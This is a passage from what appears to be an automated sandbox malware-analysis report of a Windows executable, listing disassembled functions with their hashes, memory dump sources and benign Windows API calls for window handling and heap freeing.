                  • Opcode ID: 24ac3b976f72b8cb925be76938e39708a31e755e1f2620b158eb84e899a4d75b
                  • Instruction ID: 09486bc07fe0774a1529acb4808cd204306b342521da30e1a641e5d68102420d
                  • Opcode Fuzzy Hash: 24ac3b976f72b8cb925be76938e39708a31e755e1f2620b158eb84e899a4d75b
                  • Instruction Fuzzy Hash: ECD1E5B1A043459FDB18EF28C88075BBBE0BF55308F04456DE8899B642D734EA59CF9A
                  Function 001902F6 Relevance: .3, Instructions: 323COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction ID: f553af5067035eee2339a82fab84ed9cb2ddca0d12d2b2f0f0052f7855550020
                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction Fuzzy Hash: 6CC1823A2051930EDF6F863A853403FBAA15AA6BB131A076DD4F3CB1D5FF20D564DA20
                  Function 0017E2A0 Relevance: .3, Instructions: 318COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 609a3354d60cd213b0ef820b34625d2d5b4f8c1bd2e93298271284b70fd3f371
                  • Instruction ID: c1084bb4cd39a0876d99c1f6c5014d227accd833cb45657274dcb522d63077da
                  • Opcode Fuzzy Hash: 609a3354d60cd213b0ef820b34625d2d5b4f8c1bd2e93298271284b70fd3f371
                  • Instruction Fuzzy Hash: D7E158745183848FC304CF69D49096ABBF0BF9A300F854A9EF5D587352C339EA59DBA2
                  Function 00183A3C Relevance: .3, Instructions: 263COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                  • Instruction ID: 427cf8eb292c46e7ac9af970ba52fbb9a790c6694594c3ba678ebbe29321ee9c
                  • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                  • Instruction Fuzzy Hash: E5917BB02043458BDB28FF68C891BBE73E4AF90700F58092EF5A787282DB759745CB52
                  Function 00194969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9d1908899bc49766c007ecceb4f094a0cbb653ca1e295c95ec4363d67de41fa5
                  • Instruction ID: 01bf777f4a2c29a69374d2d343cd5a173f3acac5f65bf126cb78d5959edcb160
                  • Opcode Fuzzy Hash: 9d1908899bc49766c007ecceb4f094a0cbb653ca1e295c95ec4363d67de41fa5
                  • Instruction Fuzzy Hash: DA617871A80B0867DF389A288896FBF23D5EB55708F140A1AF883DB281D751DD43C75D
                  Function 00183D6D Relevance: .2, Instructions: 232COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                  • Instruction ID: 68162f6547542f40e6c295b8146f884493308e5da33179916b0bfba2db3b50df
                  • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                  • Instruction Fuzzy Hash: 657140706043454BDB28FE28C4D1B7D77E4AFE0704F44492DF6968B282DB759B858F92
                  Function 0019473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                  • Instruction ID: f0098eb06fcff89719179ac74797dfee32a254cc93a9951256f142f82332da31
                  • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                  • Instruction Fuzzy Hash: 61512971600A8C67EF3C8AE88895FBF77D99B53344F180919E982D7282C715ED478356
                  Function 0017DE6C Relevance: .2, Instructions: 190COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ff1f3844ac71d3b1b1fc34118ae0138b605acfff8e9cb8766ff6282e02a3977
                  • Instruction ID: 363812c6e780bd880ba62143cd9ffc23165a2c47856eed39e8223a39fec96129
                  • Opcode Fuzzy Hash: 3ff1f3844ac71d3b1b1fc34118ae0138b605acfff8e9cb8766ff6282e02a3977
                  • Instruction Fuzzy Hash: 9881808121D6D49DC7168F7C38A42F53EE25777341F1942FAC4CA86AA3C73A46D8D721
                  Function 0017E8A0 Relevance: .2, Instructions: 154COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7939c33eae9f288a698e7e350d4ef73f52bb2b2e7f915c48b073e87b2517c15a
                  • Instruction ID: a009b1bb7a0d40511033a71a53cdac3204bb5df0ed511d91868b3476796b39b2
                  • Opcode Fuzzy Hash: 7939c33eae9f288a698e7e350d4ef73f52bb2b2e7f915c48b073e87b2517c15a
                  • Instruction Fuzzy Hash: A6518D315083D54FC712CF28918446EBFF1AEEA318F5989DEE4E95B213D320D649CB92
                  Function 0017F968 Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: be64fa90f4695027f07b25f3b8872c358813380c1c39fac963984670b114ae9d
                  • Instruction ID: 7fbd1e2fa48dc1b11d293a170796ad3b85c896751160864f2669015ce5a8bb9e
                  • Opcode Fuzzy Hash: be64fa90f4695027f07b25f3b8872c358813380c1c39fac963984670b114ae9d
                  • Instruction Fuzzy Hash: 78512571A083128BC748CF19D49059AF7E1FFC8354F058A2EE899E7740DB34EA59CB96
                  Function 001837C1 Relevance: .1, Instructions: 112COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction ID: 0aec7c6907d9d163ab016ed2217c61ec712759f330c58d7a7e5b08800ecfe78b
                  • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction Fuzzy Hash: B731E5B16047458FCB14EF28C85126EBBE0FBA5700F54892DE599C7342C779EA49CF92
                  Function 00175F3C Relevance: .1, Instructions: 76COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a1077e97ba8cd5a6d76d06c29d15ae4547f25d38bd4dcfa63fb218e5c73f6db7
                  • Instruction ID: f9876abd01b98de7e9eb56b621632f37c2a03ce0eb78804d3eb56b4e5e27d2d9
                  • Opcode Fuzzy Hash: a1077e97ba8cd5a6d76d06c29d15ae4547f25d38bd4dcfa63fb218e5c73f6db7
                  • Instruction Fuzzy Hash: F221DA32A205654BCB48CF2DDCE047A7762E78A311746C22FEA46CB6D1C635E965C7A0
                  Function 0017DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                  Download Yara Rule
                  APIs
                  • _swprintf.LIBCMT ref: 0017DABE
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                    • Part of subcall function 00181596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,001B0EE8,00000200,0017D202,00000000,?,00000050,001B0EE8), ref: 001815B3
                  • _strlen.LIBCMT ref: 0017DADF
                  • SetDlgItemTextW.USER32(?,001AE154,?), ref: 0017DB3F
                  • GetWindowRect.USER32(?,?), ref: 0017DB79
                  • GetClientRect.USER32(?,?), ref: 0017DB85
                  • GetWindowLongW.USER32(?,000000F0), ref: 0017DC25
                  • GetWindowRect.USER32(?,?), ref: 0017DC52
                  • SetWindowTextW.USER32(?,?), ref: 0017DC95
                  • GetSystemMetrics.USER32(00000008), ref: 0017DC9D
                  • GetWindow.USER32(?,00000005), ref: 0017DCA8
                  • GetWindowRect.USER32(00000000,?), ref: 0017DCD5
                  • GetWindow.USER32(00000000,00000002), ref: 0017DD47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                  • String ID: $%s:$CAPTION$d
                  • API String ID: 2407758923-2512411981
                  • Opcode ID: 1e4ffde57d4d915ad3a5727601cd352427f50317d4a8d69a62b59409fac89de4
                  • Instruction ID: f861f6dd951012310ac333ec88e580107e845ecca218d053839c3a25545c8537
                  • Opcode Fuzzy Hash: 1e4ffde57d4d915ad3a5727601cd352427f50317d4a8d69a62b59409fac89de4
                  • Instruction Fuzzy Hash: 7281BF72109305AFD711DFA8DC88A6BBBF9EF89704F04891DFA9993290D770E905CB52
                  Function 0019C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 0019C277
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE2F
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE41
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE53
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE65
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE77
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE89
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE9B
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BEAD
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BEBF
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BED1
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BEE3
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BEF5
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BF07
                  • _free.LIBCMT ref: 0019C26C
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 0019C28E
                  • _free.LIBCMT ref: 0019C2A3
                  • _free.LIBCMT ref: 0019C2AE
                  • _free.LIBCMT ref: 0019C2D0
                  • _free.LIBCMT ref: 0019C2E3
                  • _free.LIBCMT ref: 0019C2F1
                  • _free.LIBCMT ref: 0019C2FC
                  • _free.LIBCMT ref: 0019C334
                  • _free.LIBCMT ref: 0019C33B
                  • _free.LIBCMT ref: 0019C358
                  • _free.LIBCMT ref: 0019C370
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: e24a12f161af4dd11d1aa8303e6251802eabbb7363dc0fd0165f38e84bfa8ba2
                  • Instruction ID: 8c95993da05475dfe3e32fd391a04f63c8e363dd2fb2d0a5cc7d7dabc0994ba0
                  • Opcode Fuzzy Hash: e24a12f161af4dd11d1aa8303e6251802eabbb7363dc0fd0165f38e84bfa8ba2
                  • Instruction Fuzzy Hash: 203168326042059FEF20AF79D945B5AB3E9FF12350F15842AE489DB991DF31FD809BA0
                  Function 0018CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetWindow.USER32(?,00000005), ref: 0018CD51
                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0018CD7D
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0018CD99
                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0018CDB0
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0018CDC4
                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0018CDED
                  • DeleteObject.GDI32(00000000), ref: 0018CDF4
                  • GetWindow.USER32(00000000,00000002), ref: 0018CDFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                  • String ID: STATIC
                  • API String ID: 3820355801-1882779555
                  • Opcode ID: efa430cc7b625ab83c9b73171cbb28b4e382673df1304c388a49cd9d2d5ddc69
                  • Instruction ID: 8117449a98b0d5dd901af5befc165e593ff757e75acd2307fe2bcf22078cdf5f
                  • Opcode Fuzzy Hash: efa430cc7b625ab83c9b73171cbb28b4e382673df1304c388a49cd9d2d5ddc69
                  • Instruction Fuzzy Hash: 8711E7325427117BE3217BA09C09FAF7B5CAB65751F008522FA52A1092DB748B469BF4
                  Function 00198EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00198EC5
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 00198ED1
                  • _free.LIBCMT ref: 00198EDC
                  • _free.LIBCMT ref: 00198EE7
                  • _free.LIBCMT ref: 00198EF2
                  • _free.LIBCMT ref: 00198EFD
                  • _free.LIBCMT ref: 00198F08
                  • _free.LIBCMT ref: 00198F13
                  • _free.LIBCMT ref: 00198F1E
                  • _free.LIBCMT ref: 00198F2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: c512aaeddbc193f7425d58d10fe589cf14e3586f3d44baa47e97865cb10ecc5e
                  • Instruction ID: 8ecb455aa3b7492189785b4c254b9bca3f2c9b4fd95c6f317f9c84523eb47c1b
                  • Opcode Fuzzy Hash: c512aaeddbc193f7425d58d10fe589cf14e3586f3d44baa47e97865cb10ecc5e
                  • Instruction Fuzzy Hash: F511A27650010DAFCF11EF94C942DDA3BA5FF16350B5280A5BA088B626DB31EA519B80
                  Function 00172162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: ;%u$x%u$xc%u
                  • API String ID: 0-2277559157
                  • Opcode ID: 33a1708906097c190877ccf1636a8e606cfebc23ec03b37e4779f9edac279aad
                  • Instruction ID: be753dfa7af1a949d78a521954ac167e722f2e4ccd7df2ca8ce3d052b650c98f
                  • Opcode Fuzzy Hash: 33a1708906097c190877ccf1636a8e606cfebc23ec03b37e4779f9edac279aad
                  • Instruction Fuzzy Hash: 4EF119716042405BDB19EF3485D5BFA77BA6FA4300F08C56DF88D8B283DB749946CBA2
                  Function 0018ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
